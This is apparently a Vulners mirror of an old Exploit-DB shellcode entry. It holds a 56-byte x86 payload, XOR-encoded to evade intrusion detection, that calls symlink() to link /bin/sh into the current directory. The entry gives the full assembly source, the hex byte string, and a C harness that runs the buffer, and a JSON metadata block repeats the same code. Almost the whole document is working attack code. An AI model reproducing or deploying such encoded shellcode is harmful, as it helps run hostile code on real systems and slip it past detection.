Search...

linux/x86 symlink /bin/sh xoring 56 bytes

2004-09-26T00:00:00

ID EDB-ID:13426
Type exploitdb
Reporter dev0id
Modified 2004-09-26T00:00:00

Description

linux/x86 symlink /bin/sh xoring 56 bytes. Shellcode exploit for lin_x86 platform

                                        
                                            /*The shellcode calls the symlink() and makes the 
 link to the /bin/sh in the current dir.
	short version with anti IDS xoring
 size = 56 bytes
 OS   = *BSD
 	written by /rootteam/dev0id (www.sysworld.net)
				dev0id@uncompiled.com
BITS 32
jmp short	callme
main:
	pop	esi
	xor	ecx,ecx
	mov	cl,32
main_loop:
	xor byte	[esi+ecx],0x0f
	loop	main_loop
	xor byte	[esi+ecx],0x0f
	push	esi
	ret	
callme:
xored_shellcode:
	call	main
	db 0xe4,0x1d,0x51,0x3e,0xcf,0x87,0x49,0x08,0x82,0x51,0x0a,0x5c,0x82,0x11,0x5c
	db 0xbf,0x36,0x5f,0xc2,0x8f,0xe7,0xe6,0xf0,0xf0,0xf0,0x20,0x6d,0x66,0x61,0x20
	db 0x7c,0x67
	
*/

char shellcode[] =
	"\xeb\x11\x5e\x31\xc9\xb1\x20\x80\x34\x0e\x0f\xe2\xfa\x80\x34"
	"\x0e\x0f\x56\xc3\xe8\xea\xff\xff\xff\xe4\x1d\x51\x3e\xcf\x87"
	"\x49\x08\x82\x51\x0a\x5c\x82\x11\x5c\xbf\x36\x5f\xc2\x8f\xe7"
	"\xe6\xf0\xf0\xf0\x20\x6d\x66\x61\x20\x7c\x67";

int
main (void)
{
	void (*code)(void);
	code=(void(*)())shellcode;
	(void)code();
	return 0;
}

// milw0rm.com [2004-09-26]

JSON Vulners Source

Initial Source

{"published": "2004-09-26T00:00:00", "id": "EDB-ID:13426", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "a88c57f0db2c1b872a37df5b9cbe8f66c4a032d933a00a9acf608fe545f0982f", "description": "linux/x86 symlink /bin/sh xoring 56 bytes. Shellcode exploit for lin_x86 platform", "type": "exploitdb", "osvdbidlist": [], "lastseen": "2016-02-01T17:54:12", "edition": 1, "title": "linux/x86 symlink /bin/sh xoring 56 bytes", "href": "https://www.exploit-db.com/exploits/13426/", "modified": "2004-09-26T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://www.exploit-db.com/download/13426/", "references": [], "reporter": "dev0id", "sourceData": "/*The shellcode calls the symlink() and makes the \r\n link to the /bin/sh in the current dir.\r\n\tshort version with anti IDS xoring\r\n size = 56 bytes\r\n OS = *BSD\r\n \twritten by /rootteam/dev0id (www.sysworld.net)\r\n\t\t\t\tdev0id@uncompiled.com\r\nBITS 32\r\njmp short\tcallme\r\nmain:\r\n\tpop\tesi\r\n\txor\tecx,ecx\r\n\tmov\tcl,32\r\nmain_loop:\r\n\txor byte\t[esi+ecx],0x0f\r\n\tloop\tmain_loop\r\n\txor byte\t[esi+ecx],0x0f\r\n\tpush\tesi\r\n\tret\t\r\ncallme:\r\nxored_shellcode:\r\n\tcall\tmain\r\n\tdb 0xe4,0x1d,0x51,0x3e,0xcf,0x87,0x49,0x08,0x82,0x51,0x0a,0x5c,0x82,0x11,0x5c\r\n\tdb 0xbf,0x36,0x5f,0xc2,0x8f,0xe7,0xe6,0xf0,0xf0,0xf0,0x20,0x6d,0x66,0x61,0x20\r\n\tdb 0x7c,0x67\r\n\t\r\n*/\r\n\r\nchar shellcode[] =\r\n\t\"\\xeb\\x11\\x5e\\x31\\xc9\\xb1\\x20\\x80\\x34\\x0e\\x0f\\xe2\\xfa\\x80\\x34\"\r\n\t\"\\x0e\\x0f\\x56\\xc3\\xe8\\xea\\xff\\xff\\xff\\xe4\\x1d\\x51\\x3e\\xcf\\x87\"\r\n\t\"\\x49\\x08\\x82\\x51\\x0a\\x5c\\x82\\x11\\x5c\\xbf\\x36\\x5f\\xc2\\x8f\\xe7\"\r\n\t\"\\xe6\\xf0\\xf0\\xf0\\x20\\x6d\\x66\\x61\\x20\\x7c\\x67\";\r\n\r\nint\r\nmain (void)\r\n{\r\n\tvoid (*code)(void);\r\n\tcode=(void(*)())shellcode;\r\n\t(void)code();\r\n\treturn 0;\r\n}\n\n// milw0rm.com [2004-09-26]", "objectVersion": "1.0"}